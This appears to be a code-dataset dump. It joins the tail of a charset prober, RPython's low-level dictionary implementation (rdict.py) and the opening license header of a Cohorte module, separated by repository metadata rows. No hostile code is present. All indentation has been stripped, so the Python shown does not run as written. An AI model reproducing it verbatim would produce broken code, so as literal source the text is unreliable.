for i in range(0, aLen):
codingState = self._mCodingSM.next_state(aBuf[i])
if codingState == constants.eError:
if constants._debug:
sys.stderr.write(self.get_charset_name()
+ ' prober hit error at byte ' + str(i)
+ '\n')
self._mState = constants.eNotMe
break
elif codingState == constants.eItsMe:
self._mState = constants.eFoundIt
break
elif codingState == constants.eStart:
charLen = self._mCodingSM.get_current_charlen()
if i == 0:
self._mLastChar[1] = aBuf[0]
self._mContextAnalyzer.feed(self._mLastChar[2 - charLen:],
charLen)
self._mDistributionAnalyzer.feed(self._mLastChar, charLen)
else:
self._mContextAnalyzer.feed(aBuf[i + 1 - charLen:i + 3
- charLen], charLen)
self._mDistributionAnalyzer.feed(aBuf[i - 1:i + 1],
charLen)
self._mLastChar[0] = aBuf[aLen - 1]
if self.get_state() == constants.eDetecting:
if (self._mContextAnalyzer.got_enough_data() and
(self.get_confidence() > constants.SHORTCUT_THRESHOLD)):
self._mState = constants.eFoundIt
return self.get_state()
def get_confidence(self):
contxtCf = self._mContextAnalyzer.get_confidence()
distribCf = self._mDistributionAnalyzer.get_confidence()
return max(contxtCf, distribCf)
|
jptomo/rpython-lang-scheme
|
refs/heads/master
|
rpython/rtyper/lltypesystem/rdict.py
|
1
|
from rpython.tool.pairtype import pairtype
from rpython.flowspace.model import Constant
from rpython.rtyper.rdict import AbstractDictRepr, AbstractDictIteratorRepr
from rpython.rtyper.lltypesystem import lltype
from rpython.rtyper.lltypesystem.lloperation import llop
from rpython.rlib import objectmodel, jit
from rpython.rlib.debug import ll_assert
from rpython.rlib.rarithmetic import r_uint, intmask, LONG_BIT
from rpython.rtyper import rmodel
from rpython.rtyper.error import TyperError
HIGHEST_BIT = r_uint(intmask(1 << (LONG_BIT - 1)))
MASK = r_uint(intmask(HIGHEST_BIT - 1))
# ____________________________________________________________
#
# generic implementation of RPython dictionary, with parametric DICTKEY and
# DICTVALUE types.
#
# XXX for immutable dicts, the array should be inlined and
# resize_counter and everused are not needed.
#
# struct dictentry {
# DICTKEY key;
# bool f_valid; # (optional) the entry is filled
# bool f_everused; # (optional) the entry is or has ever been filled
# DICTVALUE value;
# int f_hash; # (optional) key hash, if hard to recompute
# }
#
# struct dicttable {
# int num_items;
# int resize_counter;
# Array *entries;
# (Function DICTKEY, DICTKEY -> bool) *fnkeyeq;
# (Function DICTKEY -> int) *fnkeyhash;
# }
#
#
class DictRepr(AbstractDictRepr):
def __init__(self, rtyper, key_repr, value_repr, dictkey, dictvalue,
custom_eq_hash=None, force_non_null=False):
self.rtyper = rtyper
self.DICT = lltype.GcForwardReference()
self.lowleveltype = lltype.Ptr(self.DICT)
self.custom_eq_hash = custom_eq_hash is not None
if not isinstance(key_repr, rmodel.Repr): # not computed yet, done by setup()
assert callable(key_repr)
self._key_repr_computer = key_repr
else:
self.external_key_repr, self.key_repr = self.pickkeyrepr(key_repr)
if not isinstance(value_repr, rmodel.Repr): # not computed yet, done by setup()
assert callable(value_repr)
self._value_repr_computer = value_repr
else:
self.external_value_repr, self.value_repr = self.pickrepr(value_repr)
self.dictkey = dictkey
self.dictvalue = dictvalue
self.dict_cache = {}
self._custom_eq_hash_repr = custom_eq_hash
self.force_non_null = force_non_null
# setup() needs to be called to finish this initialization
def _externalvsinternal(self, rtyper, item_repr):
return rmodel.externalvsinternal(self.rtyper, item_repr)
def _setup_repr(self):
if 'key_repr' not in self.__dict__:
key_repr = self._key_repr_computer()
self.external_key_repr, self.key_repr = self.pickkeyrepr(key_repr)
if 'value_repr' not in self.__dict__:
self.external_value_repr, self.value_repr = self.pickrepr(self._value_repr_computer())
if isinstance(self.DICT, lltype.GcForwardReference):
self.DICTKEY = self.key_repr.lowleveltype
self.DICTVALUE = self.value_repr.lowleveltype
# compute the shape of the DICTENTRY structure
entryfields = []
entrymeths = {
'allocate': lltype.typeMethod(_ll_malloc_entries),
'delete': _ll_free_entries,
'must_clear_key': (isinstance(self.DICTKEY, lltype.Ptr)
and self.DICTKEY._needsgc()),
'must_clear_value': (isinstance(self.DICTVALUE, lltype.Ptr)
and self.DICTVALUE._needsgc()),
}
# * the key
entryfields.append(("key", self.DICTKEY))
# * if NULL is not a valid ll value for the key or the value
# field of the entry, it can be used as a marker for
# never-used entries. Otherwise, we need an explicit flag.
s_key = self.dictkey.s_value
s_value = self.dictvalue.s_value
nullkeymarker = not self.key_repr.can_ll_be_null(s_key)
nullvaluemarker = not self.value_repr.can_ll_be_null(s_value)
if self.force_non_null:
if not nullkeymarker:
rmodel.warning("%s can be null, but forcing non-null in dict key" % s_key)
nullkeymarker = True
if not nullvaluemarker:
rmodel.warning("%s can be null, but forcing non-null in dict value" % s_value)
nullvaluemarker = True
dummykeyobj = self.key_repr.get_ll_dummyval_obj(self.rtyper,
s_key)
dummyvalueobj = self.value_repr.get_ll_dummyval_obj(self.rtyper,
s_value)
# * the state of the entry - trying to encode it as dummy objects
if nullkeymarker and dummykeyobj:
# all the state can be encoded in the key
entrymeths['everused'] = ll_everused_from_key
entrymeths['dummy_obj'] = dummykeyobj
entrymeths['valid'] = ll_valid_from_key
entrymeths['mark_deleted'] = ll_mark_deleted_in_key
# the key is overwritten by 'dummy' when the entry is deleted
entrymeths['must_clear_key'] = False
elif nullvaluemarker and dummyvalueobj:
# all the state can be encoded in the value
entrymeths['everused'] = ll_everused_from_value
entrymeths['dummy_obj'] = dummyvalueobj
entrymeths['valid'] = ll_valid_from_value
entrymeths['mark_deleted'] = ll_mark_deleted_in_value
# value is overwritten by 'dummy' when entry is deleted
entrymeths['must_clear_value'] = False
else:
# we need a flag to know if the entry was ever used
# (we cannot use a NULL as a marker for this, because
# the key and value will be reset to NULL to clear their
# reference)
entryfields.append(("f_everused", lltype.Bool))
entrymeths['everused'] = ll_everused_from_flag
# can we still rely on a dummy obj to mark deleted entries?
if dummykeyobj:
entrymeths['dummy_obj'] = dummykeyobj
entrymeths['valid'] = ll_valid_from_key
entrymeths['mark_deleted'] = ll_mark_deleted_in_key
# key is overwritten by 'dummy' when entry is deleted
entrymeths['must_clear_key'] = False
elif dummyvalueobj:
entrymeths['dummy_obj'] = dummyvalueobj
entrymeths['valid'] = ll_valid_from_value
entrymeths['mark_deleted'] = ll_mark_deleted_in_value
# value is overwritten by 'dummy' when entry is deleted
entrymeths['must_clear_value'] = False
else:
entryfields.append(("f_valid", lltype.Bool))
entrymeths['valid'] = ll_valid_from_flag
entrymeths['mark_deleted'] = ll_mark_deleted_in_flag
# * the value
entryfields.append(("value", self.DICTVALUE))
# * the hash, if needed
if self.custom_eq_hash:
fasthashfn = None
else:
fasthashfn = self.key_repr.get_ll_fasthash_function()
if getattr(self.key_repr.get_ll_eq_function(),
'no_direct_compare', False):
entrymeths['no_direct_compare'] = True
if fasthashfn is None:
entryfields.append(("f_hash", lltype.Signed))
entrymeths['hash'] = ll_hash_from_cache
else:
entrymeths['hash'] = ll_hash_recomputed
entrymeths['fasthashfn'] = fasthashfn
# Build the lltype data structures
self.DICTENTRY = lltype.Struct("dictentry", *entryfields)
self.DICTENTRYARRAY = lltype.GcArray(self.DICTENTRY,
adtmeths=entrymeths)
fields = [ ("num_items", lltype.Signed),
("resize_counter", lltype.Signed),
("entries", lltype.Ptr(self.DICTENTRYARRAY)) ]
if self.custom_eq_hash:
self.r_rdict_eqfn, self.r_rdict_hashfn = self._custom_eq_hash_repr()
fields.extend([ ("fnkeyeq", self.r_rdict_eqfn.lowleveltype),
("fnkeyhash", self.r_rdict_hashfn.lowleveltype) ])
adtmeths = {
'keyhash': ll_keyhash_custom,
'keyeq': ll_keyeq_custom,
'r_rdict_eqfn': self.r_rdict_eqfn,
'r_rdict_hashfn': self.r_rdict_hashfn,
'paranoia': True,
}
else:
# figure out which functions must be used to hash and compare
ll_keyhash = self.key_repr.get_ll_hash_function()
ll_keyeq = self.key_repr.get_ll_eq_function() # can be None
ll_keyhash = lltype.staticAdtMethod(ll_keyhash)
if ll_keyeq is not None:
ll_keyeq = lltype.staticAdtMethod(ll_keyeq)
adtmeths = {
'keyhash': ll_keyhash,
'keyeq': ll_keyeq,
'paranoia': False,
}
adtmeths['KEY'] = self.DICTKEY
adtmeths['VALUE'] = self.DICTVALUE
adtmeths['allocate'] = lltype.typeMethod(_ll_malloc_dict)
self.DICT.become(lltype.GcStruct("dicttable", adtmeths=adtmeths,
*fields))
def convert_const(self, dictobj):
from rpython.rtyper.lltypesystem import llmemory
# get object from bound dict methods
#dictobj = getattr(dictobj, '__self__', dictobj)
if dictobj is None:
return lltype.nullptr(self.DICT)
if not isinstance(dictobj, (dict, objectmodel.r_dict)):
raise TypeError("expected a dict: %r" % (dictobj,))
try:
key = Constant(dictobj)
return self.dict_cache[key]
except KeyError:
self.setup()
l_dict = ll_newdict_size(self.DICT, len(dictobj))
self.dict_cache[key] = l_dict
r_key = self.key_repr
if r_key.lowleveltype == llmemory.Address:
raise TypeError("No prebuilt dicts of address keys")
r_value = self.value_repr
if isinstance(dictobj, objectmodel.r_dict):
if self.r_rdict_eqfn.lowleveltype != lltype.Void:
l_fn = self.r_rdict_eqfn.convert_const(dictobj.key_eq)
l_dict.fnkeyeq = l_fn
if self.r_rdict_hashfn.lowleveltype != lltype.Void:
l_fn = self.r_rdict_hashfn.convert_const(dictobj.key_hash)
l_dict.fnkeyhash = l_fn
for dictkeycontainer, dictvalue in dictobj._dict.items():
llkey = r_key.convert_const(dictkeycontainer.key)
llvalue = r_value.convert_const(dictvalue)
ll_dict_insertclean(l_dict, llkey, llvalue,
dictkeycontainer.hash)
return l_dict
else:
for dictkey, dictvalue in dictobj.items():
llkey = r_key.convert_const(dictkey)
llvalue = r_value.convert_const(dictvalue)
ll_dict_insertclean(l_dict, llkey, llvalue,
l_dict.keyhash(llkey))
return l_dict
def rtype_len(self, hop):
v_dict, = hop.inputargs(self)
return hop.gendirectcall(ll_dict_len, v_dict)
def rtype_bool(self, hop):
v_dict, = hop.inputargs(self)
return hop.gendirectcall(ll_dict_bool, v_dict)
def make_iterator_repr(self, *variant):
return DictIteratorRepr(self, *variant)
def rtype_method_get(self, hop):
v_dict, v_key, v_default = hop.inputargs(self, self.key_repr,
self.value_repr)
hop.exception_cannot_occur()
v_res = hop.gendirectcall(ll_get, v_dict, v_key, v_default)
return self.recast_value(hop.llops, v_res)
def rtype_method_setdefault(self, hop):
v_dict, v_key, v_default = hop.inputargs(self, self.key_repr,
self.value_repr)
hop.exception_cannot_occur()
v_res = hop.gendirectcall(ll_setdefault, v_dict, v_key, v_default)
return self.recast_value(hop.llops, v_res)
def rtype_method_copy(self, hop):
v_dict, = hop.inputargs(self)
hop.exception_cannot_occur()
return hop.gendirectcall(ll_copy, v_dict)
def rtype_method_update(self, hop):
v_dic1, v_dic2 = hop.inputargs(self, self)
hop.exception_cannot_occur()
return hop.gendirectcall(ll_update, v_dic1, v_dic2)
def rtype_method__prepare_dict_update(self, hop):
v_dict, v_num = hop.inputargs(self, lltype.Signed)
hop.exception_cannot_occur()
hop.gendirectcall(ll_prepare_dict_update, v_dict, v_num)
def _rtype_method_kvi(self, hop, ll_func):
v_dic, = hop.inputargs(self)
r_list = hop.r_result
cLIST = hop.inputconst(lltype.Void, r_list.lowleveltype.TO)
hop.exception_cannot_occur()
return hop.gendirectcall(ll_func, cLIST, v_dic)
def rtype_method_keys(self, hop):
return self._rtype_method_kvi(hop, ll_dict_keys)
def rtype_method_values(self, hop):
return self._rtype_method_kvi(hop, ll_dict_values)
def rtype_method_items(self, hop):
return self._rtype_method_kvi(hop, ll_dict_items)
def rtype_bltn_list(self, hop):
return self._rtype_method_kvi(hop, ll_dict_keys)
def rtype_method_iterkeys(self, hop):
hop.exception_cannot_occur()
return DictIteratorRepr(self, "keys").newiter(hop)
def rtype_method_itervalues(self, hop):
hop.exception_cannot_occur()
return DictIteratorRepr(self, "values").newiter(hop)
def rtype_method_iteritems(self, hop):
hop.exception_cannot_occur()
return DictIteratorRepr(self, "items").newiter(hop)
def rtype_method_clear(self, hop):
v_dict, = hop.inputargs(self)
hop.exception_cannot_occur()
return hop.gendirectcall(ll_clear, v_dict)
def rtype_method_popitem(self, hop):
v_dict, = hop.inputargs(self)
r_tuple = hop.r_result
cTUPLE = hop.inputconst(lltype.Void, r_tuple.lowleveltype)
hop.exception_is_here()
return hop.gendirectcall(ll_popitem, cTUPLE, v_dict)
def rtype_method_pop(self, hop):
if hop.nb_args == 2:
v_args = hop.inputargs(self, self.key_repr)
target = ll_pop
elif hop.nb_args == 3:
v_args = hop.inputargs(self, self.key_repr, self.value_repr)
target = ll_pop_default
hop.exception_is_here()
v_res = hop.gendirectcall(target, *v_args)
return self.recast_value(hop.llops, v_res)
class __extend__(pairtype(DictRepr, rmodel.Repr)):
def rtype_getitem((r_dict, r_key), hop):
v_dict, v_key = hop.inputargs(r_dict, r_dict.key_repr)
if not r_dict.custom_eq_hash:
hop.has_implicit_exception(KeyError) # record that we know about it
hop.exception_is_here()
v_res = hop.gendirectcall(ll_dict_getitem, v_dict, v_key)
return r_dict.recast_value(hop.llops, v_res)
def rtype_delitem((r_dict, r_key), hop):
v_dict, v_key = hop.inputargs(r_dict, r_dict.key_repr)
if not r_dict.custom_eq_hash:
hop.has_implicit_exception(KeyError) # record that we know about it
hop.exception_is_here()
return hop.gendirectcall(ll_dict_delitem, v_dict, v_key)
def rtype_setitem((r_dict, r_key), hop):
v_dict, v_key, v_value = hop.inputargs(r_dict, r_dict.key_repr, r_dict.value_repr)
if r_dict.custom_eq_hash:
hop.exception_is_here()
else:
hop.exception_cannot_occur()
hop.gendirectcall(ll_dict_setitem, v_dict, v_key, v_value)
def rtype_contains((r_dict, r_key), hop):
v_dict, v_key = hop.inputargs(r_dict, r_dict.key_repr)
hop.exception_is_here()
return hop.gendirectcall(ll_contains, v_dict, v_key)
class __extend__(pairtype(DictRepr, DictRepr)):
def convert_from_to((r_dict1, r_dict2), v, llops):
# check that we don't convert from Dicts with
# different key/value types
if r_dict1.dictkey is None or r_dict2.dictkey is None:
return NotImplemented
if r_dict1.dictkey is not r_dict2.dictkey:
return NotImplemented
if r_dict1.dictvalue is None or r_dict2.dictvalue is None:
return NotImplemented
if r_dict1.dictvalue is not r_dict2.dictvalue:
return NotImplemented
return v
# ____________________________________________________________
#
# Low-level methods. These can be run for testing, but are meant to
# be direct_call'ed from rtyped flow graphs, which means that they will
# get flowed and annotated, mostly with SomePtr.
def ll_everused_from_flag(entries, i):
return entries[i].f_everused
def ll_everused_from_key(entries, i):
return bool(entries[i].key)
def ll_everused_from_value(entries, i):
return bool(entries[i].value)
def ll_valid_from_flag(entries, i):
return entries[i].f_valid
def ll_mark_deleted_in_flag(entries, i):
entries[i].f_valid = False
def ll_valid_from_key(entries, i):
ENTRIES = lltype.typeOf(entries).TO
dummy = ENTRIES.dummy_obj.ll_dummy_value
return entries.everused(i) and entries[i].key != dummy
def ll_mark_deleted_in_key(entries, i):
ENTRIES = lltype.typeOf(entries).TO
dummy = ENTRIES.dummy_obj.ll_dummy_value
entries[i].key = dummy
def ll_valid_from_value(entries, i):
ENTRIES = lltype.typeOf(entries).TO
dummy = ENTRIES.dummy_obj.ll_dummy_value
return entries.everused(i) and entries[i].value != dummy
def ll_mark_deleted_in_value(entries, i):
ENTRIES = lltype.typeOf(entries).TO
dummy = ENTRIES.dummy_obj.ll_dummy_value
entries[i].value = dummy
def ll_hash_from_cache(entries, i):
return entries[i].f_hash
def ll_hash_recomputed(entries, i):
ENTRIES = lltype.typeOf(entries).TO
return ENTRIES.fasthashfn(entries[i].key)
def ll_get_value(d, i):
return d.entries[i].value
def ll_keyhash_custom(d, key):
DICT = lltype.typeOf(d).TO
return objectmodel.hlinvoke(DICT.r_rdict_hashfn, d.fnkeyhash, key)
def ll_keyeq_custom(d, key1, key2):
DICT = lltype.typeOf(d).TO
return objectmodel.hlinvoke(DICT.r_rdict_eqfn, d.fnkeyeq, key1, key2)
def ll_dict_len(d):
return d.num_items
def ll_dict_bool(d):
# check if a dict is True, allowing for None
return bool(d) and d.num_items != 0
def ll_dict_getitem(d, key):
i = ll_dict_lookup(d, key, d.keyhash(key))
if not i & HIGHEST_BIT:
return ll_get_value(d, i)
else:
raise KeyError
def ll_dict_setitem(d, key, value):
hash = d.keyhash(key)
i = ll_dict_lookup(d, key, hash)
return _ll_dict_setitem_lookup_done(d, key, value, hash, i)
# It may be safe to look inside always, it has a few branches though, and their
# frequencies needs to be investigated.
@jit.look_inside_iff(lambda d, key, value, hash, i: jit.isvirtual(d) and jit.isconstant(key))
def _ll_dict_setitem_lookup_done(d, key, value, hash, i):
valid = (i & HIGHEST_BIT) == 0
i = i & MASK
ENTRY = lltype.typeOf(d.entries).TO.OF
entry = d.entries[i]
if not d.entries.everused(i):
# a new entry that was never used before
ll_assert(not valid, "valid but not everused")
rc = d.resize_counter - 3
if rc <= 0: # if needed, resize the dict -- before the insertion
ll_dict_resize(d)
i = ll_dict_lookup_clean(d, hash) # then redo the lookup for 'key'
entry = d.entries[i]
rc = d.resize_counter - 3
ll_assert(rc > 0, "ll_dict_resize failed?")
d.resize_counter = rc
if hasattr(ENTRY, 'f_everused'): entry.f_everused = True
entry.value = value
else:
# override an existing or deleted entry
entry.value = value
if valid:
return
entry.key = key
if hasattr(ENTRY, 'f_hash'): entry.f_hash = hash
if hasattr(ENTRY, 'f_valid'): entry.f_valid = True
d.num_items += 1
def ll_dict_insertclean(d, key, value, hash):
# Internal routine used by ll_dict_resize() to insert an item which is
# known to be absent from the dict. This routine also assumes that
# the dict contains no deleted entries. This routine has the advantage
# of never calling d.keyhash() and d.keyeq(), so it cannot call back
# to user code. ll_dict_insertclean() doesn't resize the dict, either.
i = ll_dict_lookup_clean(d, hash)
ENTRY = lltype.typeOf(d.entries).TO.OF
entry = d.entries[i]
entry.value = value
entry.key = key
if hasattr(ENTRY, 'f_hash'): entry.f_hash = hash
if hasattr(ENTRY, 'f_valid'): entry.f_valid = True
if hasattr(ENTRY, 'f_everused'): entry.f_everused = True
d.num_items += 1
d.resize_counter -= 3
def ll_dict_delitem(d, key):
i = ll_dict_lookup(d, key, d.keyhash(key))
if i & HIGHEST_BIT:
raise KeyError
_ll_dict_del(d, i)
@jit.look_inside_iff(lambda d, i: jit.isvirtual(d) and jit.isconstant(i))
def _ll_dict_del(d, i):
d.entries.mark_deleted(i)
d.num_items -= 1
# clear the key and the value if they are GC pointers
ENTRIES = lltype.typeOf(d.entries).TO
ENTRY = ENTRIES.OF
entry = d.entries[i]
if ENTRIES.must_clear_key:
entry.key = lltype.nullptr(ENTRY.key.TO)
if ENTRIES.must_clear_value:
entry.value = lltype.nullptr(ENTRY.value.TO)
#
# The rest is commented out: like CPython we no longer shrink the
# dictionary here. It may shrink later if we try to append a number
# of new items to it. Unsure if this behavior was designed in
# CPython or is accidental. A design reason would be that if you
# delete all items in a dictionary (e.g. with a series of
# popitem()), then CPython avoids shrinking the table several times.
#num_entries = len(d.entries)
#if num_entries > DICT_INITSIZE and d.num_items <= num_entries / 4:
# ll_dict_resize(d)
# A previous xxx: move the size checking and resize into a single
# call which is opaque to the JIT when the dict isn't virtual, to
# avoid extra branches.
def ll_dict_resize(d):
# make a 'new_size' estimate and shrink it if there are many
# deleted entry markers. See CPython for why it is a good idea to
# quadruple the dictionary size as long as it's not too big.
# (Quadrupling comes from '(d.num_items + d.num_items + 1) * 2'
# as long as num_items is not too large.)
num_extra = min(d.num_items + 1, 30000)
_ll_dict_resize_to(d, num_extra)
ll_dict_resize.oopspec = 'dict.resize(d)'
def _ll_dict_resize_to(d, num_extra):
new_estimate = (d.num_items + num_extra) * 2
new_size = DICT_INITSIZE
while new_size <= new_estimate:
new_size *= 2
old_entries = d.entries
old_size = len(d.entries)
d.entries = lltype.typeOf(old_entries).TO.allocate(new_size)
d.num_items = 0
d.resize_counter = new_size * 2
i = 0
while i < old_size:
if old_entries.valid(i):
hash = old_entries.hash(i)
entry = old_entries[i]
ll_dict_insertclean(d, entry.key, entry.value, hash)
i += 1
old_entries.delete()
# ------- a port of CPython's dictobject.c's lookdict implementation -------
PERTURB_SHIFT = 5
@jit.look_inside_iff(lambda d, key, hash: jit.isvirtual(d) and jit.isconstant(key))
@jit.oopspec('dict.lookup(d, key, hash)')
def ll_dict_lookup(d, key, hash):
entries = d.entries
ENTRIES = lltype.typeOf(entries).TO
direct_compare = not hasattr(ENTRIES, 'no_direct_compare')
mask = len(entries) - 1
i = r_uint(hash & mask)
# do the first try before any looping
if entries.valid(i):
checkingkey = entries[i].key
if direct_compare and checkingkey == key:
return i # found the entry
if d.keyeq is not None and entries.hash(i) == hash:
# correct hash, maybe the key is e.g. a different pointer to
# an equal object
found = d.keyeq(checkingkey, key)
if d.paranoia:
if (entries != d.entries or
not entries.valid(i) or entries[i].key != checkingkey):
# the compare did major nasty stuff to the dict: start over
return ll_dict_lookup(d, key, hash)
if found:
return i # found the entry
freeslot = -1
elif entries.everused(i):
freeslot = intmask(i)
else:
return i | HIGHEST_BIT # pristine entry -- lookup failed
# In the loop, a deleted entry (everused and not valid) is by far
# (factor of 100s) the least likely outcome, so test for that last.
perturb = r_uint(hash)
while 1:
# compute the next index using unsigned arithmetic
i = (i << 2) + i + perturb + 1
i = i & mask
# keep 'i' as a signed number here, to consistently pass signed
# arguments to the small helper methods.
if not entries.everused(i):
if freeslot == -1:
freeslot = intmask(i)
return r_uint(freeslot) | HIGHEST_BIT
elif entries.valid(i):
checkingkey = entries[i].key
if direct_compare and checkingkey == key:
return i
if d.keyeq is not None and entries.hash(i) == hash:
# correct hash, maybe the key is e.g. a different pointer to
# an equal object
found = d.keyeq(checkingkey, key)
if d.paranoia:
if (entries != d.entries or
not entries.valid(i) or entries[i].key != checkingkey):
# the compare did major nasty stuff to the dict:
# start over
return ll_dict_lookup(d, key, hash)
if found:
return i # found the entry
elif freeslot == -1:
freeslot = intmask(i)
perturb >>= PERTURB_SHIFT
def ll_dict_lookup_clean(d, hash):
# a simplified version of ll_dict_lookup() which assumes that the
# key is new, and the dictionary doesn't contain deleted entries.
# It only finds the next free slot for the given hash.
entries = d.entries
mask = len(entries) - 1
i = r_uint(hash & mask)
perturb = r_uint(hash)
while entries.everused(i):
i = (i << 2) + i + perturb + 1
i = i & mask
perturb >>= PERTURB_SHIFT
return i
# ____________________________________________________________
#
# Irregular operations.
DICT_INITSIZE = 8
def ll_newdict(DICT):
d = DICT.allocate()
d.entries = DICT.entries.TO.allocate(DICT_INITSIZE)
d.num_items = 0
d.resize_counter = DICT_INITSIZE * 2
return d
DictRepr.ll_newdict = staticmethod(ll_newdict)
def ll_newdict_size(DICT, length_estimate):
length_estimate = (length_estimate // 2) * 3
n = DICT_INITSIZE
while n < length_estimate:
n *= 2
d = DICT.allocate()
d.entries = DICT.entries.TO.allocate(n)
d.num_items = 0
d.resize_counter = n * 2
return d
# rpython.memory.lldict uses a dict based on Struct and Array
# instead of GcStruct and GcArray, which is done by using different
# 'allocate' and 'delete' adtmethod implementations than the ones below
def _ll_malloc_dict(DICT):
return lltype.malloc(DICT)
def _ll_malloc_entries(ENTRIES, n):
return lltype.malloc(ENTRIES, n, zero=True)
def _ll_free_entries(entries):
pass
# ____________________________________________________________
#
# Iteration.
class DictIteratorRepr(AbstractDictIteratorRepr):
def __init__(self, r_dict, variant="keys"):
self.r_dict = r_dict
self.variant = variant
self.lowleveltype = lltype.Ptr(lltype.GcStruct('dictiter',
('dict', r_dict.lowleveltype),
('index', lltype.Signed)))
self.ll_dictiter = ll_dictiter
self._ll_dictnext = _ll_dictnext
def ll_dictiter(ITERPTR, d):
iter = lltype.malloc(ITERPTR.TO)
iter.dict = d
iter.index = 0
return iter
@jit.look_inside_iff(lambda iter: jit.isvirtual(iter)
and (iter.dict is None or
jit.isvirtual(iter.dict)))
@jit.oopspec("dictiter.next(iter)")
def _ll_dictnext(iter):
dict = iter.dict
if dict:
entries = dict.entries
index = iter.index
assert index >= 0
entries_len = len(entries)
while index < entries_len:
nextindex = index + 1
if entries.valid(index):
iter.index = nextindex
return index
index = nextindex
# clear the reference to the dict and prevent restarts
iter.dict = lltype.nullptr(lltype.typeOf(iter).TO.dict.TO)
raise StopIteration
# _____________________________________________________________
# methods
def ll_get(dict, key, default):
i = ll_dict_lookup(dict, key, dict.keyhash(key))
if not i & HIGHEST_BIT:
return ll_get_value(dict, i)
else:
return default
def ll_setdefault(dict, key, default):
hash = dict.keyhash(key)
i = ll_dict_lookup(dict, key, hash)
if not i & HIGHEST_BIT:
return ll_get_value(dict, i)
else:
_ll_dict_setitem_lookup_done(dict, key, default, hash, i)
return default
def ll_copy(dict):
DICT = lltype.typeOf(dict).TO
dictsize = len(dict.entries)
d = DICT.allocate()
d.entries = DICT.entries.TO.allocate(dictsize)
d.num_items = dict.num_items
d.resize_counter = dict.resize_counter
if hasattr(DICT, 'fnkeyeq'): d.fnkeyeq = dict.fnkeyeq
if hasattr(DICT, 'fnkeyhash'): d.fnkeyhash = dict.fnkeyhash
i = 0
while i < dictsize:
d_entry = d.entries[i]
entry = dict.entries[i]
ENTRY = lltype.typeOf(d.entries).TO.OF
d_entry.key = entry.key
if hasattr(ENTRY, 'f_valid'): d_entry.f_valid = entry.f_valid
if hasattr(ENTRY, 'f_everused'): d_entry.f_everused = entry.f_everused
d_entry.value = entry.value
if hasattr(ENTRY, 'f_hash'): d_entry.f_hash = entry.f_hash
i += 1
return d
ll_copy.oopspec = 'dict.copy(dict)'
def ll_clear(d):
if (len(d.entries) == DICT_INITSIZE and
d.resize_counter == DICT_INITSIZE * 2):
return
old_entries = d.entries
d.entries = lltype.typeOf(old_entries).TO.allocate(DICT_INITSIZE)
d.num_items = 0
d.resize_counter = DICT_INITSIZE * 2
old_entries.delete()
ll_clear.oopspec = 'dict.clear(d)'
def ll_update(dic1, dic2):
if dic1 == dic2:
return
ll_prepare_dict_update(dic1, dic2.num_items)
entries = dic2.entries
d2len = len(entries)
i = 0
while i < d2len:
if entries.valid(i):
entry = entries[i]
hash = entries.hash(i)
key = entry.key
value = entry.value
j = ll_dict_lookup(dic1, key, hash)
_ll_dict_setitem_lookup_done(dic1, key, value, hash, j)
i += 1
ll_update.oopspec = 'dict.update(dic1, dic2)'
def ll_prepare_dict_update(d, num_extra):
# Prescale 'd' for 'num_extra' items, assuming that most items don't
# collide. If this assumption is false, 'd' becomes too large by at
# most 'num_extra'. The logic is based on:
# (d.resize_counter - 1) // 3 = room left in d
# so, if num_extra == 1, we need d.resize_counter > 3
# if num_extra == 2, we need d.resize_counter > 6 etc.
# Note however a further hack: if num_extra <= d.num_items,
# we avoid calling _ll_dict_resize_to here. This is to handle
# the case where dict.update() actually has a lot of collisions.
# If num_extra is much greater than d.num_items the conditional_call
# will trigger anyway, which is really the goal.
x = num_extra - d.num_items
jit.conditional_call(d.resize_counter <= x * 3,
_ll_dict_resize_to, d, num_extra)
# this is an implementation of keys(), values() and items()
# in a single function.
# note that by specialization on func, three different
# and very efficient functions are created.
def recast(P, v):
if isinstance(P, lltype.Ptr):
return lltype.cast_pointer(P, v)
else:
return v
def _make_ll_keys_values_items(kind):
def ll_kvi(LIST, dic):
res = LIST.ll_newlist(dic.num_items)
entries = dic.entries
dlen = len(entries)
items = res.ll_items()
i = 0
p = 0
while i < dlen:
if entries.valid(i):
ELEM = lltype.typeOf(items).TO.OF
if ELEM is not lltype.Void:
entry = entries[i]
if kind == 'items':
r = lltype.malloc(ELEM.TO)
r.item0 = recast(ELEM.TO.item0, entry.key)
r.item1 = recast(ELEM.TO.item1, entry.value)
items[p] = r
elif kind == 'keys':
items[p] = recast(ELEM, entry.key)
elif kind == 'values':
items[p] = recast(ELEM, entry.value)
p += 1
i += 1
assert p == res.ll_length()
return res
ll_kvi.oopspec = 'dict.%s(dic)' % kind
return ll_kvi
ll_dict_keys = _make_ll_keys_values_items('keys')
ll_dict_values = _make_ll_keys_values_items('values')
ll_dict_items = _make_ll_keys_values_items('items')
def ll_contains(d, key):
i = ll_dict_lookup(d, key, d.keyhash(key))
return not i & HIGHEST_BIT
POPITEMINDEX = lltype.Struct('PopItemIndex', ('nextindex', lltype.Signed))
global_popitem_index = lltype.malloc(POPITEMINDEX, zero=True, immortal=True)
def _ll_getnextitem(dic):
entries = dic.entries
ENTRY = lltype.typeOf(entries).TO.OF
dmask = len(entries) - 1
if hasattr(ENTRY, 'f_hash'):
if entries.valid(0):
return 0
base = entries[0].f_hash
else:
base = global_popitem_index.nextindex
counter = 0
while counter <= dmask:
i = (base + counter) & dmask
counter += 1
if entries.valid(i):
break
else:
raise KeyError
if hasattr(ENTRY, 'f_hash'):
entries[0].f_hash = base + counter
else:
global_popitem_index.nextindex = base + counter
return i
def ll_popitem(ELEM, dic):
i = _ll_getnextitem(dic)
entry = dic.entries[i]
r = lltype.malloc(ELEM.TO)
r.item0 = recast(ELEM.TO.item0, entry.key)
r.item1 = recast(ELEM.TO.item1, entry.value)
_ll_dict_del(dic, r_uint(i))
return r
def ll_pop(dic, key):
i = ll_dict_lookup(dic, key, dic.keyhash(key))
if not i & HIGHEST_BIT:
value = ll_get_value(dic, r_uint(i))
_ll_dict_del(dic, r_uint(i))
return value
else:
raise KeyError
def ll_pop_default(dic, key, dfl):
try:
return ll_pop(dic, key)
except KeyError:
return dfl
|
isandlaTech/cohorte-demos
|
refs/heads/dev
|
led/dump/led-demo-raspberry/cohorte/dist/cohorte-1.0.0-1.0.0-20141201.234602-19-python-distribution/repo/bundles/cohorte/composer/node/criteria/reliability/__init__.py
|
8
|
#!/usr/bin/env python
# -- Content-Encoding: UTF-8 --
"""
Cohorte Composer criteria components
:author: Thomas Calmant
:license: Apache Software License 2.0
..
Copyright 2014 isandlaTech
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
